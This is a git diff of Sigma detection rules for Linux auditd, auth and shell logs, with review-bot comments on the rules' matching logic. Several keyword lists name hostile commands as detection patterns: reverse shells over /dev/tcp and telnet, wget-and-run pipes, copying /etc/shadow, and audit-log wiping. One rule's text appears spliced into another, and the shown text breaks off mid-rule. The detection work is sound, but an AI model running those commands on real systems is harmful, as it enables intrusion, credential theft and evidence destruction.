service: auditd detection: - selection: - type: PATH - name: - - /etc/lsb-release - - /etc/redhat-release - - /etc/issue - selection2: - type: EXECVE - a0: - - uname - - uptime - condition: selection or selection2 -tags: - - attack.discovery - - attack.t1082 + selection_1: + type: PATH + name: + - /etc/lsb-release + - /etc/redhat-release + - /etc/issue + selection_2: + type: EXECVE + a0: + - uname + - uptime + - lsmod + - hostname + - env + selection_3: + type: EXECVE + a0: grep + a1|contains: + - vbox + - vm + - xen + - virtio + - hv + selection_4: + type: EXECVE + a0: kmod + a1: list + condition: 1 of selection_* falsepositives: - - Legitimate administrative activity + - Likely level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml index dc0f65b67..637b70e2c 100644 
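Review bot: `selection_3` matches any `grep` whose second argument contains `vm` or `hv`, and two-letter substrings will hit far more than hypervisor checks (`vmlinuz`, `nvme`, `hvac`), while an option such as `-i` in front of the pattern moves it to `a2` and the check misses entirely; `env` and `hostname` as bare `a0` values will also fire from ordinary shell scripts. Changing `falsepositives` to `Likely` acknowledges this, but even at `level: low` the rule will produce volume; tightening the grep patterns to longer tokens (for example `vmware`, `virtualbox`, `hypervisor` rather than `vm`/`hv`) or moving `env`/`hostname` into a separately weighted selection would make the alert more useful.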
--- a/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml @@ -1,15 +1,15 @@ -title: System Information Discovery +title: System and Hardware Information Discovery id: 1f358e2e-cb63-43c3-b575-dfb072a6814f related: - id: 42df45e7-e6e9-43b5-8f26-bec5b39cc239 type: derived status: stable description: Detects system information discovery commands +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware author: Ömer Günal, oscd.community date: 2020/10/08 -modified: 2021/09/14 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md +modified: 2022/11/26 tags: - attack.discovery - attack.t1082 @@ -18,17 +18,17 @@ logsource: service: auditd detection: selection: - type: 'PATH' - name: - - '/sys/class/dmi/id/bios_version' - - '/sys/class/dmi/id/product_name' - - '/sys/class/dmi/id/chassis_vendor' - - '/proc/scsi/scsi' - - '/proc/ide/hd0/model' - - '/proc/version' - - '/etc/*version' - - '/etc/*release' - - '/etc/issue' + type: 'PATH' + name: + - '/sys/class/dmi/id/bios_version' + - '/sys/class/dmi/id/product_name' + - '/sys/class/dmi/id/chassis_vendor' + - '/proc/scsi/scsi' + - '/proc/ide/hd0/model' + - '/proc/version' + - '/etc/*version' + - '/etc/*release' + - '/etc/issue' condition: selection falsepositives: - Legitimate administration activities diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml index 61dfc0fb6..8910fea39 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml 
@@ -1,33 +1,33 @@ -title: 'System Shutdown/Reboot' +title: System Shutdown/Reboot - Linux id: 4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f status: test -description: 'Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.' -author: 'Igor Fits, oscd.community' +description: Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. references: - - hhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md +author: 'Igor Fits, oscd.community' date: 2020/10/15 -modified: 2021/11/27 +modified: 2022/11/26 +tags: + - attack.impact + - attack.t1529 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - execve: - type: 'EXECVE' - shutdowncmd: - - 'shutdown' - - 'reboot' - - 'halt' - - 'poweroff' - init: - - 'init' - - 'telinit' - initselection: - - '0' - - '6' - condition: execve and (shutdowncmd or (init and initselection)) + execve: + type: 'EXECVE' + shutdowncmd: + - 'shutdown' + - 'reboot' + - 'halt' + - 'poweroff' + init: + - 'init' + - 'telinit' + initselection: + - 0 + - 6 + condition: execve and (shutdowncmd or (init and initselection)) falsepositives: - - Legitimate administrative activity + - Legitimate administrative activity level: informational -tags: - - attack.impact - - attack.t1529 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml index 96bfcc8be..e856859f3 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml 
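Review bot: The `initselection` values change from the strings `'0'`/`'6'` to the bare integers `0`/`6`, but auditd EXECVE arguments are recorded as strings, and because `shutdowncmd`, `init` and `initselection` are unbound keyword lists rather than `a0`/`a1` field matches, a literal `0` or `6` is searched across the whole record — `uid=0` or any other numeric field can satisfy it, so `init and initselection` is far looser than the title suggests. Whether the integer literal even compiles to a match against a string argument depends on the backend, which this repository's own converter should be checked for before merging. Binding the values to the argv fields is stricter and backend-neutral: under a `type: 'EXECVE'` selection use `a0: ['init', 'telinit']` with `a1: ['0', '6']`, and `a0: ['shutdown', 'reboot', 'halt', 'poweroff']` for the direct commands, keeping `systemctl reboot|poweroff|halt` in scope through an `a1` variant.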
@@ -1,30 +1,29 @@ title: Systemd Service Creation id: 1bac86ba-41aa-4f62-9d6b-405eac99b485 -status: experimental +status: test description: Detects a creation of systemd services which could be used by adversaries to execute malicious code. -author: 'Pawel Mazur' references: - - https://attack.mitre.org/techniques/T1543/002/ - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md +author: 'Pawel Mazur' date: 2022/02/03 modified: 2022/02/06 +tags: + - attack.persistence + - attack.t1543.002 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - path: - type: 'PATH' - nametype: 'CREATE' - name_1: - name|startswith: - - '/usr/lib/systemd/system/' - - '/etc/systemd/system/' - name_2: - name|contains: '/.config/systemd/user/' - condition: path and 1 of name_* + path: + type: 'PATH' + nametype: 'CREATE' + name_1: + name|startswith: + - '/usr/lib/systemd/system/' + - '/etc/systemd/system/' + name_2: + name|contains: '/.config/systemd/user/' + condition: path and 1 of name_* falsepositives: - - Admin work like legit service installs. + - Admin work like legit service installs. level: medium -tags: - - attack.persistence - - attack.t1543.002 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml new file mode 100644 index 000000000..5c76b3f5b --- /dev/null +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml 
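Review bot: The unit-directory list on the new side still misses paths a systemd persistence rule should watch: `/lib/systemd/system/` (a real directory rather than a symlink on distributions without merged `/usr`, so auditd records the path as written), `/run/systemd/system/` (runtime units, enough to survive until reboot) and `/usr/local/lib/systemd/system/`, plus `~/.local/share/systemd/user/` for user units. Because `nametype: 'CREATE'` is required, overwriting an existing unit file is also out of scope; that may be deliberate for noise reasons but deserves a one-line comment so nobody assumes modifications are covered. Suggested additions to `name_1`: `- '/lib/systemd/system/'`, `- '/run/systemd/system/'`, `- '/usr/local/lib/systemd/system/'`.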
@@ -0,0 +1,53 @@ +title: Unix Shell Configuration Modification +id: a94cdd87-6c54-4678-a6cc-2814ffe5a13d +related: + - id: e74e15cc-c4b6-4c80-b7eb-dfe49feb7fe9 + type: obsoletes +status: test +description: Detect unix shell configuration modification. Adversaries may establish persistence through executing malicious commands triggered when a new shell is opened. +references: + - https://objective-see.org/blog/blog_0x68.html + - https://www.glitch-cat.com/p/green-lambert-and-attack + - https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat +author: Peter Matkovski, IAI +date: 2023/03/06 +modified: 2023/03/15 +tags: + - attack.persistence + - attack.t1546.004 +logsource: + product: linux + service: auditd +detection: + selection: + type: 'PATH' + name: + - '/etc/shells' + - '/etc/profile' + - '/etc/profile.d/*' + - '/etc/bash.bashrc' + - '/etc/bashrc' + - '/etc/zsh/zprofile' + - '/etc/zsh/zshrc' + - '/etc/zsh/zlogin' + - '/etc/zsh/zlogout' + - '/etc/csh.cshrc' + - '/etc/csh.login' + - '/root/.bashrc' + - '/root/.bash_profile' + - '/root/.profile' + - '/root/.zshrc' + - '/root/.zprofile' + - '/home/*/.bashrc' + - '/home/*/.zshrc' + - '/home/*/.bash_profile' + - '/home/*/.zprofile' + - '/home/*/.profile' + - '/home/*/.bash_login' + - '/home/*/.bash_logout' + - '/home/*/.zlogin' + - '/home/*/.zlogout' + condition: selection +falsepositives: + - Admin or User activity are expected to generate some false positives +level: medium diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml index 6673e20bf..6509ff29d 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml 
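Review bot: The new rule matches any auditd PATH record naming these files, with no `nametype` or permission filter, so its usefulness hinges entirely on the host's audit rules — with a watch such as `-w /etc/profile -p wa` only writes surface, but with `-p rwa` or a broad syscall rule every interactive login (which sources `/etc/profile` and `~/.bashrc`) fires this medium-level alert. The required watch set is not documented; the Webshell rule in this same commit shows the convention, a comment under `detection:` listing the `-w … -p wa -k …` lines the rule expects, and this rule should carry the same. The file list is also uneven: `.bash_login`, `.bash_logout`, `.zlogin` and `.zlogout` are covered for `/home/*` but not for `/root`, and `zshenv` (`/etc/zsh/zshenv`, `/home/*/.zshenv`, `/root/.zshenv`), which zsh reads for every invocation including non-interactive ones, is missing entirely. Home directories outside `/home` are not covered either, which is worth stating in the description.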
@@ -1,27 +1,27 @@ title: Steganography Unzip Hidden Information From Picture File id: edd595d7-7895-4fa7-acb3-85a18a8772ca +status: test description: Detects extracting of zip file from image file +references: + - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ author: 'Pawel Mazur' -status: experimental date: 2021/09/09 -references: - - https://attack.mitre.org/techniques/T1027/003/ - - https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/ +modified: 2022/10/09 tags: - - attack.defense_evasion - - attack.t1027.003 -falsepositives: - - Unknown -level: low + - attack.defense_evasion + - attack.t1027.003 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - commands: - type: EXECVE - a0: unzip - a1: - a1|endswith: - - '.jpg' - - '.png' - condition: commands and a1 + commands: + type: EXECVE + a0: unzip + a1: + a1|endswith: + - '.jpg' + - '.png' + condition: commands and a1 +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_user_discovery.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_user_discovery.yml index 6526a061d..2468ebdf0 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_user_discovery.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_user_discovery.yml 
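Review bot: The detection only tests `a1`, so `unzip -o secret.jpg`, `unzip -q …`, `unzip -d out/ …` or any other option before the archive name moves the `.jpg`/`.png` argument to `a2` and the rule is silent; `unzip` invoked by absolute path also escapes, since `a0` is argv[0] as passed. A cheap improvement is a list-of-maps selection carrying `a1|endswith`, `a2|endswith` and `a3|endswith` with the same extensions, extended with `.jpeg` and `.gif`. The selection named `a1` wrapping an `a1|endswith` field reads as if the field were matched twice; renaming it (`archive:`) and updating `condition: commands and archive` would avoid that confusion.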
@@ -2,25 +2,25 @@ title: System Owner or User Discovery id: 9a0d8ca0-2385-4020-b6c6-cb6153ca56f3 status: test description: Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. -author: Timur Zinniatullin, oscd.community references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md +author: Timur Zinniatullin, oscd.community date: 2019/10/21 modified: 2021/11/27 +tags: + - attack.discovery + - attack.t1033 logsource: - product: linux - service: auditd + product: linux + service: auditd detection: - selection: - type: 'EXECVE' - a0: - - 'users' - - 'w' - - 'who' - condition: selection + selection: + type: 'EXECVE' + a0: + - 'users' + - 'w' + - 'who' + condition: selection falsepositives: - - Admin activity + - Admin activity level: low -tags: - - attack.discovery - - attack.t1033 diff --git a/src/main/resources/rules/linux/auditd/lnx_auditd_web_rce.yml b/src/main/resources/rules/linux/auditd/lnx_auditd_web_rce.yml index f9402ce14..047a72c20 100644 --- a/src/main/resources/rules/linux/auditd/lnx_auditd_web_rce.yml +++ b/src/main/resources/rules/linux/auditd/lnx_auditd_web_rce.yml 
@@ -1,17 +1,24 @@ title: Webshell Remote Command Execution id: c0d3734d-330f-4a03-aae2-65dacc6a8222 -status: experimental +status: test description: Detects possible command execution by web application/web shell +references: + - Personal Experience of the Author author: Ilyas Ochkov, Beyu Denis, oscd.community date: 2019/10/12 -modified: 2021/11/11 -references: - - personal experience +modified: 2022/12/25 +tags: + - attack.persistence + - attack.t1505.003 logsource: product: linux service: auditd detection: selection: + # You need to add to the following rules to your auditd.conf config: + # -a always,exit -F arch=b32 -S execve -F euid=33 -k detect_execve_www + # -a always,exit -F arch=b64 -S execve -F euid=33 -k detect_execve_www + # Change the number "33" to the ID of your WebServer user. Default: www-data:x:33:33 type: 'SYSCALL' syscall: 'execve' key: 'detect_execve_www' @@ -20,6 +27,3 @@ falsepositives: - Admin activity - Crazy web applications level: critical -tags: - - attack.persistence - - attack.t1505.003 diff --git a/src/main/resources/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml b/src/main/resources/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml new file mode 100644 index 000000000..27829b539 --- /dev/null +++ b/src/main/resources/rules/linux/builtin/auth/lnx_auth_pwnkit_local_privilege_escalation.yml 
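Review bot: The new comment under `selection:` tells the operator to add the `-a always,exit … -k detect_execve_www` lines to `auditd.conf`, but that file holds daemon settings only; audit rules belong in `/etc/audit/audit.rules` or a file under `/etc/audit/rules.d/` loaded by `augenrules`, and rules pasted into `auditd.conf` are simply ignored. Suggest `# You need to add the following rules to your audit rules (e.g. /etc/audit/rules.d/www.rules), not auditd.conf:`. Since the rule keys on `key: 'detect_execve_www'` rather than on the uid, it is also worth saying in the comment that a host running more than one web-server user needs one `-F euid=` line per user, otherwise the `critical` level gives false confidence.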
@@ -0,0 +1,25 @@ +title: PwnKit Local Privilege Escalation +id: 0506a799-698b-43b4-85a1-ac4c84c720e9 +status: test +description: Detects potential PwnKit exploitation CVE-2021-4034 in auth logs +references: + - https://twitter.com/wdormann/status/1486161836961579020 +author: Sreeman +date: 2022/01/26 +modified: 2023/01/23 +tags: + - attack.privilege_escalation + - attack.t1548.001 +logsource: + product: linux + service: auth +detection: + keywords: + '|all': + - 'pkexec' + - 'The value for environment variable XAUTHORITY contains suscipious content' + - '[USER=root] [TTY=/dev/pts/0]' + condition: keywords +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/other/lnx_clamav.yml b/src/main/resources/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml similarity index 76% rename from src/main/resources/rules/linux/other/lnx_clamav.yml rename to src/main/resources/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml index a4f6cec6e..43da1ba42 100644 --- a/src/main/resources/rules/linux/other/lnx_clamav.yml +++ b/src/main/resources/rules/linux/builtin/clamav/lnx_clamav_relevant_message.yml @@ -2,10 +2,13 @@ title: Relevant ClamAV Message id: 36aa86ca-fd9d-4456-814e-d3b1b8e1e0bb status: stable description: Detects relevant ClamAV messages -author: Florian Roth -date: 2017/03/01 references: - - https://github.com/ossec/ossec-hids/blob/master/etc/rules/clam_av_rules.xml + - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/clam_av_rules.xml +author: Florian Roth (Nextron Systems) +date: 2017/03/01 +tags: + - attack.resource_development + - attack.t1588.001 logsource: product: linux service: clamav @@ -20,6 +23,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.resource_development - - attack.t1588.001 
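Review bot: The `'[TTY=/dev/pts/0]'` keyword in the new PwnKit rule pins the alert to the first pseudo-terminal, so exploitation from `pts/1`, from a session without a controlling terminal (reverse shell, cron) or on any host where pts/0 is already taken is not detected; `[USER=root]` alone carries the signal. The widely used public exploits also trigger a different pkexec message, `The value for the SHELL variable was not found the /etc/shells file`, which this single `|all` group can never match, and — to be verified against the sample in the referenced tweet — polkit's source brackets the variable name (`[XAUTHORITY]`), so the bracket-less string may not match as a substring either. Splitting the keywords into two groups that share `pkexec` and `[USER=root]` covers both variants without the TTY constraint.
```yaml
detection:
  keywords_xauthority:
    '|all':
      - 'pkexec'
      - 'contains suscipious content'
      - '[USER=root]'
  keywords_shell:
    '|all':
      - 'pkexec'
      - 'The value for the SHELL variable was not found the /etc/shells file'
      - '[USER=root]'
  condition: 1 of keywords_*
```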
diff --git a/src/main/resources/rules/linux/builtin/lnx_crontab_file_modification.yml b/src/main/resources/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml similarity index 54% rename from src/main/resources/rules/linux/builtin/lnx_crontab_file_modification.yml rename to src/main/resources/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml index dc5bde7ba..fc07550d2 100644 --- a/src/main/resources/rules/linux/builtin/lnx_crontab_file_modification.yml +++ b/src/main/resources/rules/linux/builtin/cron/lnx_cron_crontab_file_modification.yml @@ -1,12 +1,14 @@ title: Modifying Crontab id: af202fd3-7bff-4212-a25a-fb34606cfcbe -status: experimental +status: test description: Detects suspicious modification of crontab file. -# log example: Apr 16 11:18:18 localhost CROND[3333]: (user) REPLACE (user) -author: Pawel Mazur references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md +author: Pawel Mazur date: 2022/04/16 +tags: + - attack.persistence + - attack.t1053.003 logsource: product: linux service: cron @@ -15,8 +17,5 @@ detection: - 'REPLACE' condition: keywords falsepositives: - - Legitimate modification of crontab + - Legitimate modification of crontab level: medium -tags: - - attack.persistence - - attack.t1053.003 diff --git a/src/main/resources/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml b/src/main/resources/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml new file mode 100644 index 000000000..616740cba --- /dev/null +++ b/src/main/resources/rules/linux/builtin/guacamole/lnx_guacamole_susp_guacamole.yml 
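Review bot: The rename drops the only documentation of what the rule matches — the `# log example: Apr 16 11:18:18 localhost CROND[3333]: (user) REPLACE (user)` comment — while the detection remains an unbound `'REPLACE'` keyword, so a reader of the new file cannot tell this is cron's crontab-replacement message rather than an SQL or shell token. Please restore it as a comment directly above the keyword, `# cron log example: Apr 16 11:18:18 localhost CROND[3333]: (user) REPLACE (user)`. Anchoring the keyword to cron's own formatting, `- ') REPLACE ('`, would also stop the bare word in other cron-logged command lines from firing.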
@@ -0,0 +1,22 @@ +title: Guacamole Two Users Sharing Session Anomaly +id: 1edd77db-0669-4fef-9598-165bda82826d +status: test +description: Detects suspicious session with two users present +references: + - https://research.checkpoint.com/2020/apache-guacamole-rce/ +author: Florian Roth (Nextron Systems) +date: 2020/07/03 +modified: 2021/11/27 +tags: + - attack.credential_access + - attack.t1212 +logsource: + product: linux + service: guacamole +detection: + selection: + - '(2 users now present)' + condition: selection +falsepositives: + - Unknown +level: high diff --git a/src/main/resources/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml b/src/main/resources/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml new file mode 100644 index 000000000..3022534da --- /dev/null +++ b/src/main/resources/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml 
@@ -0,0 +1,82 @@ +title: Equation Group Indicators +id: 41e5c73d-9983-4b69-bd03-e13b67e9623c +status: test +description: Detects suspicious shell commands used in various Equation Group scripts and tools +references: + - https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1 +author: Florian Roth (Nextron Systems) +date: 2017/04/09 +modified: 2021/11/27 +tags: + - attack.execution + - attack.g0020 + - attack.t1059.004 +logsource: + product: linux +detection: + keywords: + # evolvingstrategy, elgingamble, estesfox + - 'chown root*chmod 4777 ' + - 'cp /bin/sh .;chown' + # tmpwatch + - 'chmod 4777 /tmp/.scsi/dev/bin/gsh' + - 'chown root:root /tmp/.scsi/dev/bin/' + # estesfox + - 'chown root:root x;' + # ratload + - '/bin/telnet locip locport < /dev/console | /bin/sh' + - '/tmp/ratload' + # ewok + - 'ewok -t ' + # xspy + - 'xspy -display ' + # elatedmonkey + - 'cat > /dev/tcp/127.0.0.1/80 < /dev/null' + # noclient + - 'ping -c 2 *; grep * /proc/net/arp >/tmp/gx' + - 'iptables * OUTPUT -p tcp -d 127.0.0.1 --tcp-flags RST RST -j DROP;' + # auditcleaner + - '> /var/log/audit/audit.log; rm -f .' + - 'cp /var/log/audit/audit.log .tmp' + # reverse shell + - 'sh >/dev/tcp/* <&1 2>&1' + # packrat + - 'ncat -vv -l -p * <' + - 'nc -vv -l -p * <' + # empty bowl + - '< /dev/console | uudecode && uncompress' + - 'sendmail -osendmail;chmod +x sendmail' + # echowrecker + - '/usr/bin/wget -O /tmp/a http* && chmod 755 /tmp/cron' + # dubmoat + - 'chmod 666 /var/run/utmp~' + # poptop + - 'chmod 700 nscd crond' + # abopscript + - 'cp /etc/shadow /tmp/.' 
+ # ys + - ' /dev/null 2>&1 && uncompress' + # jacktelnet + - 'chmod 700 jp&&netstat -an|grep' + # others + - 'uudecode > /dev/null 2>&1 && uncompress -f * && chmod 755' + - 'chmod 700 crond' + - 'wget http*; chmod +x /tmp/sendmail' + - 'chmod 700 fp sendmail pt' + - 'chmod 755 /usr/vmsys/bin/pipe' + - 'chmod -R 755 /usr/vmsys' + - 'chmod 755 $opbin/*tunnel' + - 'chmod 700 sendmail' + - 'chmod 0700 sendmail' + - '/usr/bin/wget http*sendmail;chmod +x sendmail;' + - '&& telnet * 2>&1 .bash_history" to clear the history and this is not one the commands listed here. We can't be exhaustive for all the possibilities ! - # - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell. therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here if .bash_history is cleared, it will always be detected +references: + - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md + - https://www.hackers-arise.com/post/2016/06/20/covering-your-bash-shell-tracks-antiforensics author: Patrick Bareiss date: 2019/03/24 -modified: 2021/11/24 -references: - - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md - - https://attack.mitre.org/techniques/T1070/003/ - - https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics +modified: 2022/12/25 +tags: + - attack.defense_evasion + - attack.t1070.003 +# Example config for this one (place it in .bash_profile): +# (is_empty=false; inotifywait -m .bash_history | while read file; do if [ $(wc -l <.bash_history) -lt 1 ]; then if [ "$is_empty" = false ]; then logger -i -p local5.info -t empty_bash_history "$USER : ~/.bash_history is empty "; is_empty=true; fi; else is_empty=false; fi; done ) & +# It monitors the size of .bash_history and log the words "empty_bash_history" whenever a previously not empty bash_history 
becomes empty +# We define an empty file as a document with 0 or 1 lines (it can be a line with only one space character for example) +# It has two advantages over the version suggested by Patrick Bareiss : +# - it is not relative to the exact command used to clear .bash_history : for instance Caldera uses "> .bash_history" to clear the history and this is not one the commands listed here. We can't be exhaustive for all the possibilities ! +# - the method suggested by Patrick Bareiss logs all the commands entered directly in a bash shell. therefore it may miss some events (for instance it doesn't log the commands launched from a Caldera agent). Here if .bash_history is cleared, it will always be detected logsource: product: linux detection: @@ -38,6 +40,3 @@ detection: falsepositives: - Unknown level: high -tags: - - attack.defense_evasion - - attack.t1070.003 diff --git a/src/main/resources/rules/linux/builtin/lnx_shell_priv_esc_prep.yml b/src/main/resources/rules/linux/builtin/lnx_shell_priv_esc_prep.yml deleted file mode 100644 index d447ec8de..000000000 --- a/src/main/resources/rules/linux/builtin/lnx_shell_priv_esc_prep.yml +++ /dev/null 
@@ -1,71 +0,0 @@ -title: Privilege Escalation Preparation -id: 444ade84-c362-4260-b1f3-e45e20e1a905 -status: test -description: Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation. -author: Patrick Bareiss -references: - - https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ - - https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/ -date: 2019/04/05 -modified: 2021/11/27 -logsource: - product: linux -detection: - keywords: - # distribution type and kernel version - - 'cat /etc/issue' - - 'cat /etc/*-release' - - 'cat /proc/version' - - 'uname -a' - - 'uname -mrs' - - 'rpm -q kernel' - - 'dmesg | grep Linux' - - 'ls /boot | grep vmlinuz-' - # environment variables - - 'cat /etc/profile' - - 'cat /etc/bashrc' - - 'cat ~/.bash_profile' - - 'cat ~/.bashrc' - - 'cat ~/.bash_logout' - # applications and services as root - - 'ps -aux | grep root' - - 'ps -ef | grep root' - # scheduled tasks - - 'crontab -l' - - 'cat /etc/cron*' - - 'cat /etc/cron.allow' - - 'cat /etc/cron.deny' - - 'cat /etc/crontab' - # search for plain text user/passwords - - 'grep -i user *' - - 'grep -i pass *' - # networking - - 'ifconfig' - - 'cat /etc/network/interfaces' - - 'cat /etc/sysconfig/network' - - 'cat /etc/resolv.conf' - - 'cat /etc/networks' - - 'iptables -L' - - 'lsof -i' - - 'netstat -antup' - - 'netstat -antpx' - - 'netstat -tulpn' - - 'arp -e' - - 'route' - # sensitive files - - 'cat /etc/passwd' - - 'cat /etc/group' - - 'cat /etc/shadow' - # sticky bits - - 'find / -perm -u=s' - - 'find / -perm -g=s' - - 'find / -perm -4000' - - 'find / -perm -2000' - timeframe: 30m - condition: keywords -falsepositives: - - Troubleshooting on Linux Machines -level: medium -tags: - - attack.execution - - attack.t1059.004 
diff --git a/src/main/resources/rules/linux/builtin/lnx_shell_susp_commands.yml b/src/main/resources/rules/linux/builtin/lnx_shell_susp_commands.yml index 4c8a64463..dc901ee3b 100644 --- a/src/main/resources/rules/linux/builtin/lnx_shell_susp_commands.yml +++ b/src/main/resources/rules/linux/builtin/lnx_shell_susp_commands.yml 
@@ -2,58 +2,58 @@ title: Suspicious Activity in Shell Commands id: 2aa1440c-9ae9-4d92-84a7-a9e5f5e31695 status: test description: Detects suspicious shell commands used in various exploit codes (see references) -author: Florian Roth references: - - http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html - - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb#L121 - - http://pastebin.com/FtygZ1cg - - https://artkond.com/2017/03/23/pivoting-guide/ + - https://web.archive.org/web/20170319121015/http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html + - https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb + - http://pastebin.com/FtygZ1cg + - https://artkond.com/2017/03/23/pivoting-guide/ +author: Florian Roth (Nextron Systems) date: 2017/08/21 modified: 2021/11/27 +tags: + - attack.execution + - attack.t1059.004 logsource: - product: linux + product: linux detection: - keywords: + keywords: # Generic suspicious commands - - 'wget * - http* | perl' - - 'wget * - http* | sh' - - 'wget * - http* | bash' - - 'python -m SimpleHTTPServer' - - '-m http.server' # Python 3 - - 'import pty; pty.spawn*' - - 'socat exec:*' - - 'socat -O /tmp/*' - - 'socat tcp-connect*' - - '*echo binary >>*' + - 'wget * - http* | perl' + - 'wget * - http* | sh' + - 'wget * - http* | bash' + - 'python -m SimpleHTTPServer' + - '-m http.server' # Python 3 + - 'import pty; pty.spawn*' + - 'socat exec:*' + - 'socat -O /tmp/*' + - 'socat tcp-connect*' + - '*echo binary >>*' # Malware - - '*wget *; chmod +x*' - - '*wget *; chmod 777 *' - - '*cd /tmp || cd /var/run || cd /mnt*' + - '*wget *; chmod +x*' + - '*wget *; chmod 777 *' + - '*cd /tmp || cd /var/run || cd /mnt*' # Apache Struts in-the-wild exploit codes - - '*stop;service iptables stop;*' - - 
